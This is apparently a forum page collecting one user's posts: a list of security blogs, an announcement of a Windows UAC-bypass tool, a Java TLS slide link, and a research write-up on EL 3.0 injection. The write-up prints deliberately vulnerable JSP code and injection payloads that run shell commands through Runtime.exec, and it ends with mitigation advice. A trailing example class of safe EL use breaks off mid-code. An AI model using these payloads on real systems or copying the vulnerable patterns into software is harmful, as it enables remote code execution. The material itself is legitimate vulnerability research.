Everything posted by Nytro
-
[h=1]Top 100+ Cyber Security Blogs & Infosec Resources[/h]

[h=2]PR8[/h]
[h=3]#1 CIO[/h] Resources related to information security, including news and opinion and more on software and application flaws and fixes, data breaches, the insider threat and the latest hacker attacks.
[h=3]#2 TechRepublic – Security[/h] TechRepublic helps IT decision-makers identify technologies and strategies to empower workers and streamline business processes. Their security section dives into the latest threats surrounding cyber security.
[h=3]#3 US Cert[/h] US-CERT’s mission is to improve the nation’s cybersecurity posture, coordinate cyber information sharing, and proactively manage cyber risks.
[h=3]#4 Wired’s Threat Level[/h] Privacy, crime, and online security are the topics that carry the headlines here. You’ll find everything from opinionated pieces to the latest threat alerts.
[h=3]#5 Zero Day from ZDNet[/h] Staying on top of the latest in software/hardware security research, vulnerabilities, threats and computer attacks. The Zero Day blog on ZDNet is a must for anyone keeping track of the industry.

[h=2]PR7[/h]
[h=3]#6 CERIAS Security Blog[/h] The Center for Education and Research in Information Assurance and Security blog is where Gene Spafford shares his expertise. It’s called the center for multidisciplinary research for a reason.
[h=3]#7 CSO Online[/h] Areas of focus include information security, physical security, business continuity, identity and access management, loss prevention and more.
[h=3]#8 Dark Reading[/h] Dark Reading is a comprehensive news and information portal that focuses on IT security, helping information security professionals manage the balance between data protection and user access.
[h=3]#9 Google Online Security Blog[/h] This is Google’s own security blog, which focuses on all of the latest developments in the security world. Get the latest news and insights from Google on security and safety on the Internet.
[h=3]#10 Red Tape Chronicles[/h] NBC News’ Red Tape Chronicles brings you news stories and information on the latest developments in the cyber security space. Find topics that range from privacy to security.
[h=3]#11 InformationWeek Security[/h] You can expect all of the latest news and zero-day alerts from this IT security news site. The content is updated daily and is a major news source for everything to do with cyber security.
[h=3]#12 Internet Storm Center[/h] The Internet Storm Center gathers millions of intrusion detection log entries every day, from sensors covering over 500,000 IP addresses in over 50 countries.
[h=3]#13 Schneier On Security[/h] Bruce Schneier is an internationally renowned security technologist, and has been called a “security guru” by The Economist. He knows his stuff and is a voice in the cyber security industry.
[h=3]#14 Securelist Cyber Security Blog[/h] This is another Kaspersky Lab web property that focuses on malware, phishing, and the cyber security industry. There is no shortage of information and news on what’s happening in the cyber world.
[h=3]#15 Symantec Weblog[/h] The Symantec Weblog uses global research to provide unparalleled analysis of and protection from malware, security risks, vulnerabilities, and spam.
[h=3]#16 The Guardian’s Information Security Hub[/h] The Guardian is a respected, global media company that highlights issues across many areas. Their Information Security Hub lives up to the coverage they offer in other areas and focuses on security.
[h=3]#17 Zone Alarm Cyber Security Blog[/h] Information on malware and protecting yourself online. From malware alerts to practical online security tips, the Zone Alarm blog will keep you briefed on the latest industry news.

[h=2]PR6[/h]
[h=3]#18 BH Consulting’s Security Watch Blog[/h] BH Consulting’s Security Watch Blog was formed to keep readers regularly informed with content detailing everything you would want to know about information security and web threats.
[h=3]#19 Contagio Malware Dump[/h] Contagio is a collection of the latest malware samples, threats, observations, and analyses. Get informed, technical education on the newest forms of malware.
[h=3]#20 Cyber Crime & Doing Time[/h] CyberCrime & Doing Time is a blog about cyber crime and justice related issues. Gary Warner from Malcovery owns this blog and offers up educational and engaging posts on the latest threats.
[h=3]#21 David Lacey’s IT Security Blog[/h] David Lacey’s IT Security Blog offers the latest ideas, best practices, and business issues associated with managing security. The blog is hosted on ComputerWeekly.com.
[h=3]#22 Dell SecureWorks[/h] Dell SecureWorks’ Security & Compliance blog is dedicated to providing up-to-date news and information to help IT professionals and others keep their business secure online.
[h=3]#23 F-Secure Safe & Savvy Blog[/h] Safe and Savvy blogs about how to protect your online life and the irreplaceable content on your computer. They write about real-life experiences while providing helpful tips on security issues.
[h=3]#24 Fox IT Security Blog[/h] Information technology is the main topic on the Fox IT security blog. From news to opinions, Fox IT provides excellent content for anyone interested in technology and security.
[h=3]#25 Fortinet Blog[/h] The Fortinet cyber security blog has something for everyone. There are articles on security research and industry trends, as well as a healthy section focusing entirely on Security 101.
[h=3]#26 Help Net Security[/h] Help Net Security has been a prime resource for information security news since 1998. The site always hosts fresh content including articles, new product releases, latest industry news, podcasts and more.
[h=3]#28 Infosecurity Magazine[/h] What more can you ask for? It’s an online magazine dedicated entirely to the strategy, insight, and techniques that are a daily part of the cyber security industry.
[h=3]#29 Krebs On Security[/h] Brian Krebs is the face of cyber security journalism. As a former writer for the Washington Post, Krebs is able to bring his skills as an investigative journalist to the task and provide the most in-depth coverage of security.
[h=3]#30 Malwarebytes[/h] Malwarebytes is at the forefront of malware protection, which makes this the perfect blog to stay up-to-date with the latest zero-day threats and cyber security news.
[h=3]#31 McAfee Security Blog[/h] The McAfee security blog talks about research and threat analysis, as well as providing knowledgeable insight into malware and zero-day threats that plague businesses and consumers.
[h=3]#32 Microsoft Malware Protection Center[/h] The Microsoft Malware Protection Center (MMPC) is committed to helping Microsoft customers keep their computers secure. The MMPC stays agile to combat evolving threats.
[h=3]#32 Naked Security[/h] Naked Security is Sophos’s award-winning threat news room, giving you news, opinion, advice and research on computer security issues and the latest internet threats.
[h=3]#33 Network Computing[/h] Network Computing’s content adheres to the valuable “For IT, By IT” methodology, delivering timely strategy & tactics, news, in-depth features, expert reviews, and opinionated blogs.
[h=3]#34 SANS Institute AppSec Blog[/h] SANS Software Security focuses the deep resources of SANS on the growing threats to the application layer by providing training, certification, research, and community initiatives.
[h=3]#35 SC Magazine[/h] SC Magazine arms information security professionals with the in-depth, unbiased business and technical information they need to tackle the countless security challenges they face.
[h=3]#36 Search Security[/h] Search Security provides immediate access to breaking industry news, virus alerts, new hacker threats and attacks, security and certification training resources.
[h=3]#37 Securing The Human[/h] SANS is the most trusted and by far the largest source for information security training and security certification in the world, which makes their blog a must read for security professionals.
[h=3]#38 Security Watch[/h] Neil Rubenking heads the charge on PC Mag’s Security Watch. His style is witty and he posts frequently, so you’ll always find something worthwhile to read.
[h=3]#39 Stop Badware Blog[/h] StopBadware is a nonprofit anti-malware organization whose work makes the Web safer through the prevention, mitigation, and remediation of badware websites.
[h=3]#40 Sucuri Blog[/h] Sucuri knows all about malware and WordPress security. It’s what they do. You’ll find no shortage of expert advice on how to secure your WordPress site and keep it malware-free.
[h=3]#41 TaoSecurity[/h] Richard Bejtlich’s blog on digital security, concentrating on global challenges posed by China and other targeted adversaries. Definitely a blog that has been a fixture in the security community.
[h=3]#42 Techworld Security[/h] The cyber security section on Techworld.com covers news on the latest threats and zero-day exploits. They also offer an abundance of topics ranging from security to how-tos, as well as technology reviews.
[h=3]#43 The Honeynet Project[/h] The Honeynet Project members engage the broader security community and educate the public about threats to systems and information.
[h=3]#44 Threatpost[/h] Threatpost, the Kaspersky Lab security news service, is an independent news site which is a leading source of information about IT and business security for hundreds of thousands of professionals worldwide.
[h=3]#45 Threat Track Security[/h] Threat Track Security’s IT blog has its thumb on the pulse of the industry. Whether you are in the IT industry or not, if you are interested in security, this blog is for you.
[h=3]#46 Trend Micro Simply Security[/h] Trend Micro Simply Security offers independent news and views as well as expert insight from Trend’s security experts. The site covers topics ranging from cloud security and data protection to security and privacy.
[h=3]#47 Veracode Blog[/h] Veracode Security Blog: application security research, security trends and opinions. Everything you want to know about if you work in infosec or online.
[h=3]#48 Unmask Parasites Blog[/h] Unmask Parasites focuses on reviewing the latest security threats, zero-days, and exploits. There is everything from security-related news to information on keeping your site secure and malware-free.
[h=3]#49 We Live Security[/h] We Live Security is a site about research and information, not products. We Live Security’s writers represent the cream of ESET’s researchers and writers. They deliver in-depth research and analysis on security.
[h=3]#50 Xylibox Security Blog[/h] Tracking and demystifying cybercrime is what happens here. The author never fails to produce consistent, detailed breakdowns of the latest malware and security tools.

[h=2]PR5[/h]
[h=3]#51 BankInfoSecurity[/h] BankInfoSecurity is a multi-media website published by Information Security Media Group, Corp. (ISMG), a company specializing in coverage of information security, risk management, privacy and fraud.
[h=3]#52 Cyveillance Blog[/h] From sophisticated DDoS botnet attacks to phishing, the Cyveillance blog will keep you up-to-date with breaking cyber security news and information on everything related to web threats, malware and security.
[h=3]#53 Forbes’ Firewall[/h] Forbes’ Firewall covers cyber security news and information on the latest exploits and trends affecting the industry. The articles are on point and informative, with the quality you can expect from Forbes.
[h=3]#54 GovInfoSecurity[/h] GovInfoSecurity is a multi-media website published by Information Security Media Group, Corp. (ISMG), a company specializing in coverage of information security, risk management, privacy and fraud.
[h=3]#55 Graham Cluley’s Security Blog[/h] Graham Cluley is an award-winning cyber security blogger and independent computer security analyst. His blog reflects his knowledge and experience in the industry.
[h=3]#56 GRC’s Security Now Podcast[/h] Security Now is a weekly podcast hosted by Steve Gibson and Leo Laporte. The show is sponsored by Gibson Research Corporation, a company specializing in data recovery and security.
[h=3]#57 HotforSecurity[/h] This blog covers the sizzling world of computer security. You’ll find plenty of steamy stories from the dynamic world of internet fraud, scams, and malware.
[h=3]#58 Imperva Blog[/h] From analyst reports to case studies, to blog posts and white papers, the Imperva blog keeps step with the latest malware and security threats. You’ll find information on DDoS, malware, and zero-day threats.
[h=3]#59 IT Knowledge Exchange – Security Bytes[/h] Written by the staff of SearchSecurity.com and Information Security magazine, Security Bytes covers topics across the spectrum of security, privacy and compliance.
[h=3]#60 ItProPortal.com[/h] ITProPortal.com was one of the very first technology websites to launch in the UK back in 1999 and has grown to become one of the UK’s leading and most respected technology information resources.
[h=3]#61 Lenny Zeltser On Information Security[/h] This blog by Lenny Zeltser focuses on information security. Lenny is a business and tech leader with extensive hands-on experience in IT and information security.
[h=3]#62 Network Security Blog with Martin McKeay[/h] One man’s views on security, privacy – and anything else for that matter. Trends, information, news: you’ll find it all on the Network Security blog, and what’s more, it’s delivered with style.
[h=3]#63 PandaLabs Cyber Security Blog[/h] This blog covers everything you need to know about internet threats. The PandaLabs blog keeps you abreast of the latest developments in cyber security.
[h=3]#64 PaulDotCom[/h] PaulDotCom Security Weekly’s mission is to provide free content within the subject matter of IT security news, vulnerabilities, hacking, and research.
[h=3]#65 Privacy & Information Security Law Blog[/h] The views of one man on security, privacy and anything else that catches his attention. Security expert Martin McKeay talks about malware, privacy and security on this blog.
[h=3]#66 Rational Survivability[/h] Hoff’s ramblings about information survivability, information centricity, risk management and disruptive innovation. Hoff was a CISSP, CISA, CISM and NSA IAM; he now spends the AMF money on coffee.
[h=3]#67 Risky Business[/h] Risky.biz is another security podcast that focuses on covering recent developments in cyber security and the threat landscape. The show has been around since 2007, and takes a light approach to security news.
[h=3]#68 Root Labs RDIST[/h] Their research provides cutting-edge insight into solving tough security problems. There are countless articles on the latest cyber security trends and threats.
[h=3]#69 Seculert Blog[/h] The Seculert blog is a security blog with a focus on Advanced Persistent Threats and malware. There is no shortage of network security tips and insider information on the latest zero-days.
[h=3]#70 Security Street by Rapid7[/h] Rapid7 provides vulnerability management, compliance and penetration testing solutions for web applications, network and database security. Their community, Security Street, covers all of these issues.
[h=3]#71 Securosis Blog[/h] Securosis is the world’s leading independent security research and advisory firm, offering unparalleled insight and unique value to meet the challenges of managing security and compliance in a Web 2.0 world.
[h=3]#72 SilverSky Altitude Blog[/h] SilverSky is a cloud security services provider with a lot of knowledge in the industry. Their blog, the Altitude blog, is updated regularly with news and information every security professional should be aware of.
[h=3]#73 SpiderLabs Security Blog[/h] SpiderLabs is an elite team of ethical hackers, investigators and researchers at Trustwave advancing the security capabilities of leading businesses and organizations throughout the world. The site covers the latest security news.
[h=3]#74 Social-Engineering.org[/h] Social-Engineering.org is a cyber security blog that covers a wide range of security related topics. The site is also home to a podcast and a team of security professionals who share their expertise on all things security.
[h=3]#75 The Security Skeptic[/h] The Security Skeptic blogs about all matters related to Internet security, from domain names (DNS), firewalls and network security to phishing, malware and social engineering.
[h=3]#76 Thought Crime Cyber Security Blog[/h] Moxie Marlinspike’s blog covers computer security and software development, particularly in the areas of secure protocols, cryptography, privacy, and anonymity.
[h=3]#77 Troy Hunt’s Blog[/h] A software architect and Microsoft MVP, Troy Hunt writes about security concepts and process improvement in software delivery. The quality of content found here makes this blog worth visiting.

[h=2]PR4[/h]
[h=3]#78 1 Raindrop[/h] Gunnar Peterson weaves his thoughts on distributed systems, security, and software together on his blog 1 Raindrop. The blog is both informative and insightful, and the coverage is on point.
[h=3]#79 Andrew Hay’s Cyber Security Blog[/h] Andrew Hay is the Director of Applied Security Research and Chief Evangelist at CloudPassage, Inc. This is his personal blog where he talks about security and other news.
[h=3]#80 Carnal Ownage[/h] Carnal Ownage is a must stop for security researchers and hackers alike. This cyber security blog goes into excruciating detail on attack methodology and highlights the threats your organization should be aware of.
[h=3]#81 Command Line Kung Fu[/h] This blog covers fun, useful, interesting, security related (and non-security related) tips and tricks associated with the command line. Find tips on OS X, Linux and Windows.
[h=3]#82 Dancho Danchev’s Blog[/h] This blog covers trends and fads, tactics and strategies, intersecting with third-party research, speculations and real-time CYBERINT assessments, all packed with sarcastic attitude.
[h=3]#83 Darknet[/h] Don’t Learn to HACK – Hack to LEARN. That’s the motto at Darknet. The site covers ethical hacking, penetration testing, and computer security. Learn about interesting infosec related news, tools and more.
[h=3]#84 Errata Security[/h] Errata Security is a team of dedicated security researchers that practice offensive security. The insight gained from research is delivered on the blog, which covers a variety of topics and real world scenarios.
[h=3]#85 Exotic Liability[/h] Chris Nickerson and Ryan Jones take it up a notch in their cyber security podcast. They routinely thumb their nose at the typical industry rhetoric and offer insight and commentary you won’t hear anywhere else.
[h=3]#86 Hack Surfer[/h] HackSurfer was formed by a group of businessmen and women, engineers, mathematicians, linguists and information analysts with a passion for making simple, powerful use of big data.
[h=3]#87 InfoSec Institute Resources[/h] The InfoSec Institute resources section has a broad selection of content and research on cyber security, threats, and of course, infosec. You’ll also find tutorials, training videos and more.
[h=3]#88 J4vv4D Security Blog[/h] Javvad Malik has worked in information security for his entire career and covers different aspects of security on his blog, J4vv4D. He also regularly offers his insight through entertaining and informative YouTube videos.
[h=3]#89 Liquid Matrix[/h] In a world that seems to be losing the notion of journalism, Liquidmatrix Security Digest remains committed to long form articles that dig into the major issues affecting the industry with feature articles.
[h=3]#90 Malcovery Security Blog[/h] This is Malcovery Security’s contribution to the knowledge base of information security issues. They provide relevant insight and opinions on all of the newest threats faced by the industry.
[h=3]#91 Malware Don’t Need Coffee[/h] Malware Don’t Need Coffee is a cyber security blog that focuses on malware research and provides educated commentary on all the latest exploits and security bugs. The site covers research in all areas of network security.
[h=3]#92 McGrew Security Blog[/h] Wesley McGrew understands security and the nature of today’s digital landscape, especially its impact on infrastructure and business security. His blog covers all of the important cyber security stuff.
[h=3]#93 Network Security Podcast[/h] Since 2007, the Network Security Podcast has been dishing out the dirt on cyber threats and security issues faced by the industry. It’s a great resource if you want to hear a discussion on what’s happening in infosec.
[h=3]#94 New School Security[/h] This blog is inspired by the book and the movement towards a New School. The New School of Information Security is a book by Adam Shostack and Andrew Stewart, published in 2008.
[h=3]#95 NoVA Infosec[/h] Founded in January of 2008 on a Saturday evening, NovaInfosec.com is dedicated to the community of Northern Virginia-, Washington, DC-, and southern Maryland-based security professionals.
[h=3]#96 Packet Pushers Podcast[/h] The Packet Pushers Podcast offers deeply technical, hardcore discussions on the latest security trends. Co-hosts Greg Ferro and Ethan Banks lead the show with their many years of network engineering experience.
[h=3]#97 Security Affairs[/h] Pierluigi Paganini is a company director, researcher, security evangelist, security analyst and freelance writer. His blog Security Affairs stays abreast of all the latest in cyber security.
[h=3]#98 Security Bistro[/h] Security Bistro is where security experts come together for good talk, information on the latest ingenious threats and, one hopes, the latest clever ways to counter them.
[h=3]#99 Security Geeks[/h] Find tips on computer security, choosing a password properly, and other practical online security tips. No shortage of interesting content circling the technology space here.
[h=3]#100 Security Musings[/h] Gemini Security Solutions, Inc. is an information security consulting firm that applies creativity, passion, and insight to defend against today’s growing threats. Their blog, Security Musings, covers everything security.
[h=3]#101 Security Uncorked[/h] Jennifer (Jabbusch) Minella, aka JJ, is a network security engineer and consultant with 15 years of experience. She shares her knowledge on infosec on her blog and offers plenty of information on the latest security trends.
[h=3]#102 S!Ri.URZ[/h] This blog has been on the cyber security scene since as far back as 2006. The blog covers malware, rogues, ransomware and everything else related to cyber security.
[h=3]#103 The AShimmy Blog[/h] StillSecureAfterAllTheseYears.com (yes, a really long domain!) is the AShimmy Blog, Alan Shimel’s personal Blogger blog on security, work, and family life.
[h=3]#104 The Falcon’s View[/h] Ben Tomhave is a security professional who has served the industry in a variety of roles and security positions. This is reflected in his writing and the knowledge shared on his cyber security blog.
[h=3]#105 The Harmony Guy[/h] You’ll find links and commentary related mostly to online privacy and security, particularly with social networking. The blog started back in 2007 and has been going ever since.
[h=3]#106 The Southern Fried Security Podcast[/h] The SFS Podcast is designed to be an information security podcast that fills the gap between technical security podcasts and Security Now. This podcast offers respectful insight on the state of security.
[h=3]#107 Uncommon Sense Security[/h] Small business information security has been an oxymoron for too long. Uncommon Sense Security is attempting to change that. The blog is entertaining and informative at the same time.

[h=2]PR3[/h]
[h=3]#108 Andy Ellis — Protecting A Better Internet[/h] Andy Ellis is the Chief Security Officer of Akamai Technologies. Opinions here are mostly his own. His blog dives into the issues centered around cyber security and technology.
[h=3]#109 DHS Daily Report[/h] A retired U.S. Army Chief Warrant Officer with more than 40 years in information technology and 35 years in information security leads the charge on this blog, offering daily news on the industry.
[h=3]#110 IT Security Expert by Dave Whitelegg[/h] The UK-based IT Security Expert blog by Dave Whitelegg, CISSP, CCSP, provides general information security advice and help in securing the home PC and home computer user, as well as business IT systems.
[h=3]#111 IT Specialist[/h] A virtual community of social networks for IT professionals located throughout the world. A great way to connect and collaborate with others in the cyber security industry.
[h=3]#112 MichaelPeters.org[/h] Michael D. Peters has been an independent information security consultant, executive, researcher, author, and catalyst with many years in information technology, and shares that knowledge on his site.
[h=3]#113 Rivalhost Security Blog[/h] Rivalhost is a DDoS mitigation company and web host that takes an active stance on updating their customers and community with a mix of topics on technology, cyber security, and DDoS.
[h=3]#114 Rud.is Security Blog[/h] This is a place to catch some opinions on a pretty weird combination of topics. You’ll likely see topics ranging from IT/Information Risk Management to iOS, Node.js, and everything in between.
[h=3]#115 Security Xploded Blog[/h] SecurityXploded – the community division of XenArmor – is a popular infosec research & development organization offering free security software, the latest research articles and free cyber security training.
[h=3]#116 Thom Langford’s Personal Security Blog[/h] An information security professional, award-winning blogger, and industry commentator, Thom Langford talks about topics relating to information security, risk management and compliance.
[h=3]#117 W. Mark Brooks IT Security Blog[/h] On his cyber security blog Brooks talks about mitigating risks and business strategies as they relate to IT. There is never a dull post and the author finds plenty of interesting security topics to dissect.

[h=2]PR2[/h]
[h=3]#118 Ethical Hacking[/h] Ehacking.net explores ethical hacking, penetration testing, and hacking. You’ll also find a wealth of tutorials on BackTrack and other penetration testing tips. An ideal site for information security researchers.
[h=3]#119 IT Security Column[/h] An IT security blog that features general knowledge of IT security, online crime news, and tips on how to deal with online and computer threats. Plus, listings of information security threats and defenses.
[h=3]#120 Kevin Townsend’s Cyber Security Blog[/h] This site is about computer and information security. It is maintained by Kevin Townsend, the original founder of ITsecurity.com and a freelance journalist and writer with more than 10 years’ experience.
[h=3]#121 Psilva’s Prophecies[/h] Peter Silva covers security for F5 Networks’ Technical Marketing Team. With his theatre background and knowledge of security, his blog makes for an interesting pit stop for security news.
[h=3]#122 Websense Security Labs[/h] Websense Security Labs does a great job of sharing information and insight on the latest cyber security news. Their blog has been around since ’07. There is plenty of material to dig through for research.

[h=2]PR1[/h]
[h=3]#123 DDoS Protection & Cyber Security Blog[/h] A blog that centers around the threat posed by distributed denial of service (DDoS) attacks. You’ll find a news section that offers a snapshot of the latest security trends, as well as epic posts highlighting the industry.
[h=3]#124 Dave Waterson on Security[/h] Dave Waterson is an experienced IT security technologist, and inventor of patented and patent-pending security technology in the anti-keylogging and anti-phishing fields.
[h=3]#125 Following The Wh1t3 Rabbit[/h] Rafal Los has been working on the defensive side of security for over 10 years. His blog, Following The Wh1t3 Rabbit, focuses on clearing the confusion around security and offering tools to improve security.

[h=2]PR0[/h]
[h=3]#126 FireEye Blog[/h] FireEye has invented a purpose-built, virtual machine-based security platform that provides real-time threat protection. FireEye has been called a “hot security firm”, and their blog backs that up.
[h=3]#127 How They Hack[/h] HowTheyHack is a general tech blog surrounding themes related to hacking and network security. Most of the posts are centered around tutorials, hacking news, security exploits and the author’s opinions.
[h=3]#128 Technology.info[/h] Technology.info combines the best of ITProPortal.com and IP EXPO, offering a resource for IT professionals and those interested in security. The site boasts a wide variety of information security research and topics.

Source: Top 100+ Cyber Security Blogs & Infosec Resources
-
UACMe - Defeating Windows User Account Control
by EP_X0FF » Fri Dec 19, 2014 8:19 am

Inspired by the ITW WinNT/Pitou legacy MBR x86-64 bootkit dropper. Before anything else, read this excellent work -> Windows 7 UAC whitelist, and read it carefully, as it explains everything, especially why Windows User Account Control is a big fucken marketing joke from Microsoft, just like DSE. Below is our variant of his work, with removal of all C++ trash and adapting a different UAC bypass method from WinNT/Pitou (the bootkit authors also used Leo Davidson's work as a base). The only setting where UAC is somehow able to show itself is if it is set to maximum. But here another Microsoft UAC architecture flaw by design is revealed: even when it blocks something, it cannot properly determine what it blocked, representing possible malicious actions as taken by Microsoft, facepalm. Will you trust a verified Microsoft action with a verified digital certificate from Microsoft?

Supported Windows versions: all from 7xxx builds up to the latest, so "confidential" MS build 9901.

Project overview:
- Win32 and x64 configurations.
- Compiled in MSVS 2013 U4; pure C, compiled as C++.
- No additional dependencies. All libs in attach.
- Debug build configurations are present only for debugging stuff, not for UAC bypass stage execution (shellcode will be screwed up).
- Requires Heaven's Gate adaptation for proper work from a Win32 app under WOW64; if you don't know what HG is, then skip this moment.

x64 loader VT: https://www.virustotal.com/en/file/78caa8fa31a802547b160f41c03fd825d01d1edcd064e06984d0cf84a3bc7813/analysis/1418968668/
x86-32 loader VT: https://www.virustotal.com/en/file/97952e6bb9cb4b3c43215597be0bb1da504d2066fd1717c20d6fd64917311c06/analysis/1418968812/

Screenshots taken from Windows 10 TP build 9901: uac101.png, uac102.png

Attachment: UACME.rar (pass: uacme)

Source: KernelMode.info • View topic - UACMe - Defeating Windows User Account Control
-
Java's SSLSocket: How Bad APIs Compromise Security
Tale of a Frustrated Android Developer
Dr. Georg Lukas <lukas@rt-solutions.de>

- A brief history of SSL/TLS
- Java TLS APIs: All-or-nothing security
- Making your (Android) application more secure
- TLS in the Post-Snowden Era

Download: https://deepsec.net/docs/Slides/2014/Java%27s_SSLSocket_-_How_Bad_APIs_Compromise_Security_-_Georg_Lukas.pdf
-
[h=3]EL 3.0/Lambda Injection: Hacker Friendly Java[/h]

The following article explains the mechanics of a code injection attack called EL3 Injection in applications that make use of the relatively new EL3 processor in Java. New mechanics and operators introduced in EL3 make the discovery and exploitation of this exposure almost as easy and seamless as SQL Injection, and the impact of the vulnerability is severe, with potential impacts such as denial of service, information theft and even remote code execution. Since the EL3 technology is relatively new it's probably not (YET) as common as other severe exposures, but at the very least, it will put a big wide THEY DID WHAAAAT!? smile on your face.

[Note – The following article discusses a generic application-level coding flaw in modern Java applications, NOT a Java 0-day. Keep on reading – the juicier RCE payloads are presented at the end]

While trying (and miserably failing) to create a training kit for EL Injection (or Spring EL Injection, JSR245, if you will), published by Stefano Di Paola and Arshan Dabirsiaghi, I spent some time trying to get a working build of the Eclipse-based STS IDE version which supported the vulnerable Java Spring MVC versions (Spring 3.0.0-3.0.5). Turns out that someone did a REALLY GOOD job eradicating every trace of the vulnerable builds, leaving only the time-consuming option of compiling the environment from scratch. Luckily, at some point, I decided to take a short break, and read about the relatively new EL in Java (JSR341, not necessarily in Java Spring) – and found something VERY interesting. Turns out that the newest Java expression language version, EL 3.0 (published sometime in 2013), includes multiple enhancements, such as operators, security restrictions on class access, and so on.

A typical source code sample of using EL3 in a Servlet or JSP page would look something like:

```jsp
<%@page import="javax.el.ELProcessor"%>
…
<%
ELProcessor elp = new ELProcessor();
Object msg = elp.eval("'Welcome' + user.name");
out.println(msg.toString());
%>
```

The ELProcessor dynamically evaluates the EL statement, and attempts to access the "name" field of the Bean (or registered class) user. After taking a couple of shots at "guessing" objects that might be accessible by default, I stumbled on one of the features that can be used to define access to classes in EL3, which includes the ELManager class methods importClass, importPackage and importStatic. These methods could be used to "import" various classes and even packages into the scope of the expression language, so they could be referenced within expressions. So in order to use classes in EL3 expressions, you'll need to include them using statements such as:

```java
elp.getELManager().importClass("java.io.File");
```

This feature was implemented due to safety concerns (or in other words, security), to make sure that access to classes is presumably prevented for any class that was not also included in the page/project's original EL imports AND application imports, so that even if developers enable user input to affect the "importPackage" or "importClass" statements, the external effect will be limited to the classes already imported in the context.

However, since many interesting classes and packages are typically used in Servlets and JSP pages, an attacker can still abuse this feature in multiple scenarios:

(1) If the developer already imported a class that the attacker needs into the EL context, and attacker-controlled input is used within the expression evaluation:

```
Input1 = "File.listRoots()[0].getAbsolutePath()"
```

```jsp
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
elp.getELManager().importClass("java.io.File");
Object path = elp.eval(input1);
out.println(path);
%>
```

(2) If the developer enabled the user to control the importClass/Package statement (no limits to human stupidity, right?), and already has a wide enough scope imported in the page/application imports:

```
Input1 = "File.listRoots()[0].listFiles()[1].getAbsolutePath()"
Input2 = "java.io.File"
```

```jsp
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
String input2 = request.getParameter("input2");
ELProcessor elp = new ELProcessor();
elp.getELManager().importClass(input2);
Object path = elp.eval(input1);
out.println(path);
%>
```

So, here you go. A nice exploit that will probably affect a couple of desolate apps, with super insecure code. Hardly worth its own classification. However, while trying to squeeze some more juice out of the potential attack vector, I stumbled upon the following, which explains the features of EL3 in great detail. To make a long story short, watch the video and skip to 7:52. It's well worth your time.

Turns out that despite the security restrictions that required developers to explicitly import classes and packages to be used in the EL3 scripts, the java.lang package was included by default, to enable the typical developer to gain access to static type objects and methods such as Boolean.TRUE and Integer.numberOfTrailingZeros. They enabled access by default to the static members of classes in JAVA.LANG, as in the java.lang package that includes java.lang.System and java.lang.Runtime! JAVA.LANG! Seems like somebody there confused "user friendly" with "hacker friendly" :) So, if for some reason, user-controlled input would stumble into an EL3 eval clause, which for some reason Java is encouraging users to use in many platforms such as JSF, CDI, Avatar and many CMSs, then attackers could do a LOT more with no requirements on specific imports:

```
Input1 = "System.getProperties()"
```

```jsp
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(input1);
out.println(sys);
%>
```

Also, instead of using the System class, we can use the Runtime static class methods to execute shell commands. For example:

```
Input1 = "Runtime.getRuntime().exec('mkdir abcde').waitFor()"
```

```jsp
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval(input1);
out.println(sys);
%>
```

An impact similar to that of Spring's counterpart of EL injection, only in mainstream Java. Cool. Now we can shamelessly classify the attack and rest. But there's more!

Although scenarios in which the user's input will get full control of the entire EL string are possible, they are much less common than scenarios in which user input might be integrated as a part of an EL string, in which case most of the previously mentioned payloads won't work. However, EL 3.0 was kind enough to present us with NEW operators, one of which is the infamous semicolon (;). As its SQL counterpart's functionality suggests, the semicolon delimiter can be used in EL 3 to close one expression, and add additional expressions, with or without logical relations to each other. Think adding multiple lines of code to a single attack payload. Think injecting payloads into the middle of an expression, while using techniques similar to blind SQL injection. Don't think. Here's a couple of examples:

```
Input1 = "; Runtime.getRuntime().exec('mkdir aaaaa12').waitFor()"
```

```jsp
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval("'Welcome' + " + input1);
out.println(sys);
%>
```

```
Input1 = "1); Runtime.getRuntime().exec('mkdir jjjbc12').waitFor("
```

```jsp
<%@page import="javax.el.ELProcessor"%>
<%@page import="javax.el.ELManager"%>
…
<%
String input1 = request.getParameter("input1");
ELProcessor elp = new ELProcessor();
Object sys = elp.eval("SomeClass.StaticMethod(" + input1 + ")");
out.println(sys);
%>
```

So due to the implementation of the semicolon operator, potential injections can now CLOSE PREVIOUS STATEMENTS and start new statements, making the potential injection almost as usable as SQL injection. Features such as EL variable declaration, value assignments and others (watch the video) just add more fuel to the fire. So much for enhanced security features.

We already identified a few instances that affect real-world applications (no instances in core products, so far), and are currently handling them in front of the relevant entities. I'll probably invest some more time in the upcoming weeks to see if any prominent Java projects are prone to this issue, but in the meantime, some practical notes: Regardless of how common these issues are, these potential exposures could easily be identified in code reviews or by source code analysis tools that track the effect of input on the various methods of the ELProcessor class, and on similar EL-related classes. Generic blind injection payloads can be added as plugins for automated scanners, and we could go bug hunting to see if any more of these potential issues exist in the wild. The mitigation is also simple: not embedding input into EL statements and validating input in case you do. I'll update this post as the research progresses.

Cheers

Posted by Shay Chen at 4:13 AM

Source: Security Tools Benchmarking: EL 3.0/Lambda Injection: Hacker Friendly Java
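As an added example (not code from Shay Chen's post, nor from any project it names), the Java class below puts the concatenation pattern the post describes next to two hardened forms of the mitigation it closes with: keeping the expression text constant and handing request data to ELProcessor.defineBean as a bean property, and, where a request parameter has to choose which property is read, allowlisting it before it is ever spliced into an expression. SafeElUsage, the User bean and the allowlist contents are assumptions for illustration; the code assumes an EL 3.0 (JSR 341) implementation such as the GlassFish reference implementation on the classpath.

```java
// Added example; not code from the original post. Assumes an EL 3.0 (JSR 341)
// implementation (javax.el.ELProcessor) is available on the classpath.
import javax.el.ELProcessor;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import java.util.regex.Pattern;

public class SafeElUsage {

    // Hypothetical stand-in for the "user" bean the post's samples reference.
    public static class User {
        private final String name;
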